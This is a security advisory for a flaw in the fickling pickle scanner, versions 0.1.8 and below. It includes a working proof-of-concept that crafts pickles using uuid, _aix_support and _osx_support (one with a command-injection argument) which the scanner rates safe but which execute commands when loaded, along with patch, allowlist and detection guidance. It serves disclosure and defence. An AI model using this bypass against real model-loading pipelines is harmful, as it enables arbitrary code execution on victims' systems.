GHSA-5hwf-rc88-82xm

GHSA-5hwf-rc88-82xm HIGH
Published March 4, 2026
CISO Take

If your ML pipelines use fickling to validate pickle files before loading models, update to 0.1.9 immediately — versions ≤0.1.8 can be bypassed with a crafted pickle that fickling reports as LIKELY_SAFE while executing arbitrary system commands. This is critical because the vulnerability converts your security control into false assurance, which is worse than no scanning. Patch today, sandbox model loading as defense-in-depth, and audit any externally-sourced models loaded during the vulnerable window.

Affected Systems

| Package  | Ecosystem | Vulnerable Range | Patched |
|----------|-----------|------------------|---------|
| fickling | pip       | <= 0.1.8         | 0.1.9   |

Do you use fickling? You're affected.
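To confirm exposure, the installed version can be checked against the vulnerable range. A minimal sketch, assuming plain numeric fickling version strings (no pre-release or local tags):

```python
from importlib import metadata

def is_vulnerable(version: str) -> bool:
    """Return True if a plain numeric fickling version is <= 0.1.8."""
    parts = tuple(int(p) for p in version.split("."))
    return parts <= (0, 1, 8)

def installed_fickling_vulnerable() -> bool:
    """Check the fickling distribution installed in this environment, if any."""
    try:
        return is_vulnerable(metadata.version("fickling"))
    except metadata.PackageNotFoundError:
        return False  # not installed, so not affected

print(is_vulnerable("0.1.8"), is_vulnerable("0.1.9"))  # True False
```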

Severity & Risk

CVSS 3.1: N/A
EPSS: N/A
KEV Status: Not in KEV
Sophistication: Trivial

Recommended Action

  1. PATCH: upgrade fickling to 0.1.9+ immediately — this is the only complete fix.
  2. WORKAROUND (if patching is delayed): manually add `uuid`, `_osx_support`, and `_aix_support` to your `UNSAFE_IMPORTS` configuration.
  3. SANDBOX: run model deserialization in isolated environments (gVisor, seccomp-restricted containers, AWS Lambda with minimal IAM) regardless of the fickling verdict.
  4. AUDIT: review logs for models loaded from external sources while running fickling ≤0.1.8; look for unexpected subprocess activity or `os.system` calls.
  5. DETECT: deploy runtime security tooling (Falco, eBPF-based sensors) to alert on subprocess spawning during model load operations.
  6. ARCHITECTURE: treat pickle safety scanners as one layer, not the sole gate — consider allowlist-based pickle validation or safe serialization formats (safetensors, ONNX) for externally sourced models.
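For the allowlist-based validation recommended above, the "Restricting Globals" pattern from the Python pickle documentation is one starting point: override `Unpickler.find_class` so that any global not explicitly permitted is refused before it can be resolved. A minimal sketch; `ALLOWED_GLOBALS` is a placeholder that you would populate with the globals your models actually require:

```python
import io
import pickle

# Placeholder allowlist: only the (module, name) pairs your models need.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}

class AllowlistUnpickler(pickle.Unpickler):
    """Refuse any global not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")

def safe_loads(data: bytes):
    """Deserialize, resolving only allowlisted globals."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Unlike a blocklist, this fails closed: a pickle importing `uuid`, `_osx_support`, or any other unlisted module raises `UnpicklingError` instead of executing.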

Classification

Compliance Impact

This CVE is relevant to:

- EU AI Act: Art. 15 - Accuracy, robustness and cybersecurity for high-risk AI systems
- ISO 42001: A.6.2.6 - AI system security controls
- NIST AI RMF: MANAGE-2.2 - Risk response plans for AI risks
- OWASP LLM Top 10: LLM03:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

# Assessment

The modules `uuid`, `_osx_support` and `_aix_support` were added to the blocklist of unsafe imports (https://github.com/trailofbits/fickling/commit/ffac3479dbb97a7a1592d85991888562d34dd05b).

# Original report

## Summary

fickling's `UNSAFE_IMPORTS` blocklist is missing at least 3 stdlib modules that provide direct arbitrary command execution: `uuid`, `_osx_support`, and `_aix_support`. These modules contain functions that internally call `subprocess.Popen()` or `os.system()` with attacker-controlled arguments. A malicious pickle file importing these modules passes both `UnsafeImports` and `NonStandardImports` checks.

## Affected Versions

- fickling <= 0.1.8 (all versions)

## Details

### Missing Modules

fickling's `UNSAFE_IMPORTS` (86 modules) does not include:

| Module | RCE Function | Internal Mechanism | Importable On |
|--------|--------------|--------------------|---------------|
| `uuid` | `_get_command_stdout(cmd, *args)` | `subprocess.Popen((cmd,) + args, stdout=PIPE, stderr=DEVNULL)` | All platforms |
| `_osx_support` | `_read_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms |
| `_osx_support` | `_find_build_tool(toolname)` | Command injection via `%s` in `_read_output("/usr/bin/xcrun -find %s" % toolname)` | All platforms |
| `_aix_support` | `_read_cmd_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms |

**Critical note:** Despite the names `_osx_support` and `_aix_support` suggesting platform-specific modules, they are importable on ALL platforms. Python includes them in the standard distribution regardless of OS.

### Why These Pass fickling

1. **`NonStandardImports`**: these are stdlib modules, so `is_std_module()` returns True → not flagged
2. **`UnsafeImports`**: module names not in `UNSAFE_IMPORTS` → not flagged
3. **`OvertlyBadEvals`**: function names added to `likely_safe_imports` (stdlib) → skipped
4. **`UnusedVariables`**: defeated by BUILD opcode (purposely unhardened)

### Proof of Concept (using fickling's opcode API)

```python
from fickling.fickle import (
    Pickled, Proto, Frame, ShortBinUnicode, StackGlobal,
    TupleOne, TupleTwo, Reduce, EmptyDict, SetItem, Build, Stop,
)
from fickling.analysis import check_safety
import struct, pickle

frame_data = b"\x95" + struct.pack("<Q", 60)

# uuid._get_command_stdout — works on ALL platforms
uuid_payload = Pickled([
    Proto(4),
    Frame(struct.pack("<Q", 60), data=frame_data),
    ShortBinUnicode("uuid"),
    ShortBinUnicode("_get_command_stdout"),
    StackGlobal(),
    ShortBinUnicode("echo"),
    ShortBinUnicode("PROOF_OF_CONCEPT"),
    TupleTwo(),
    Reduce(),
    EmptyDict(),
    ShortBinUnicode("x"),
    ShortBinUnicode("y"),
    SetItem(),
    Build(),
    Stop(),
])

# _aix_support._read_cmd_output — works on ALL platforms
aix_payload = Pickled([
    Proto(4),
    Frame(struct.pack("<Q", 60), data=frame_data),
    ShortBinUnicode("_aix_support"),
    ShortBinUnicode("_read_cmd_output"),
    StackGlobal(),
    ShortBinUnicode("echo PROOF_OF_CONCEPT"),
    TupleOne(),
    Reduce(),
    EmptyDict(),
    ShortBinUnicode("x"),
    ShortBinUnicode("y"),
    SetItem(),
    Build(),
    Stop(),
])

# _osx_support._find_build_tool — command injection via %s
osx_payload = Pickled([
    Proto(4),
    Frame(struct.pack("<Q", 60), data=frame_data),
    ShortBinUnicode("_osx_support"),
    ShortBinUnicode("_find_build_tool"),
    StackGlobal(),
    ShortBinUnicode("x; echo INJECTED #"),
    TupleOne(),
    Reduce(),
    EmptyDict(),
    ShortBinUnicode("x"),
    ShortBinUnicode("y"),
    SetItem(),
    Build(),
    Stop(),
])

# All three: fickling reports LIKELY_SAFE
for name, p in [("uuid", uuid_payload), ("aix", aix_payload), ("osx", osx_payload)]:
    result = check_safety(p)
    print(f"{name}: severity={result.severity}, issues={len(result.results)}")
    # Output: severity=Severity.LIKELY_SAFE, issues=0

# All three: pickle.loads() executes the command
pickle.loads(uuid_payload.dumps())  # prints PROOF_OF_CONCEPT
```

### Verified Output

```
$ python3 poc.py
uuid: severity=Severity.LIKELY_SAFE, issues=0
aix: severity=Severity.LIKELY_SAFE, issues=0
osx: severity=Severity.LIKELY_SAFE, issues=0
PROOF_OF_CONCEPT
```

## Impact

An attacker can craft a pickle file that executes arbitrary system commands while fickling reports it as `LIKELY_SAFE`. This affects any system relying on fickling for pickle safety validation, including ML model loading pipelines.

## Suggested Fix

Add to `UNSAFE_IMPORTS` in fickling:

```python
"uuid",
"_osx_support",
"_aix_support",
```

**Longer term:** Consider an allowlist approach — only permit known-safe stdlib modules rather than blocking known-dangerous ones. The current 86-module blocklist still has gaps because the Python stdlib contains hundreds of modules.

## Resources

- Python source: `Lib/uuid.py` lines 156-168 (`_get_command_stdout`)
- Python source: `Lib/_osx_support.py` lines 35-52 (`_read_output`), lines 54-68 (`_find_build_tool`)
- Python source: `Lib/_aix_support.py` lines 14-30 (`_read_cmd_output`)
- fickling source: `analysis.py` `UNSAFE_IMPORTS` set
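As a concrete illustration of the allowlist direction suggested in the report, the standard library's `pickletools` can statically enumerate the globals a pickle would import before anything is loaded. This is a heuristic sketch, not fickling's implementation: the `STACK_GLOBAL` handling assumes the module and attribute are the two most recently pushed strings, which holds for pickles produced by `pickle.dumps()` but can be evaded by hand-crafted opcode streams.

```python
import pickletools

def extract_globals(data: bytes) -> set[tuple[str, str]]:
    """Best-effort static scan of the globals a pickle stream would import.

    Handles the GLOBAL/INST opcodes (protocols 0-2), whose argument is a
    space-joined "module name" pair, and approximates STACK_GLOBAL
    (protocol 4+) by tracking the last two string pushes.
    """
    found: set[tuple[str, str]] = set()
    recent_strings: list[str] = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            recent_strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            found.add((recent_strings[-2], recent_strings[-1]))
        elif op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.add((module, name))
    return found

def violates_allowlist(data: bytes, allowed: set[tuple[str, str]]) -> bool:
    """True if the pickle references any global outside the allowlist."""
    return bool(extract_globals(data) - allowed)
```

With such a scan, `uuid._get_command_stdout` is rejected not because it is on a blocklist but because it is absent from the allowlist, which closes the entire class of "missing module" gaps.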

Exploitation Scenario

An adversary targeting an MLOps pipeline publishes a malicious PyTorch model to a public registry (HuggingFace Hub, GitHub, research paper artifact). The model is serialized as a pickle whose opcode sequence invokes uuid._get_command_stdout with attacker-controlled arguments, using a BUILD opcode to evade fickling's unused-variable check. When the victim's CI/CD pipeline runs fickling to pre-screen the artifact, fickling returns LIKELY_SAFE with zero issues flagged. The pipeline proceeds to load the model, triggering arbitrary command execution in the context of the ML worker process — enabling reverse shell establishment, credential exfiltration from mounted secrets, or lateral movement into training infrastructure. The attack is especially effective against automated model evaluation pipelines where no human reviews fickling output.

Timeline

Published: March 4, 2026
Last Modified: March 4, 2026
First Seen: March 24, 2026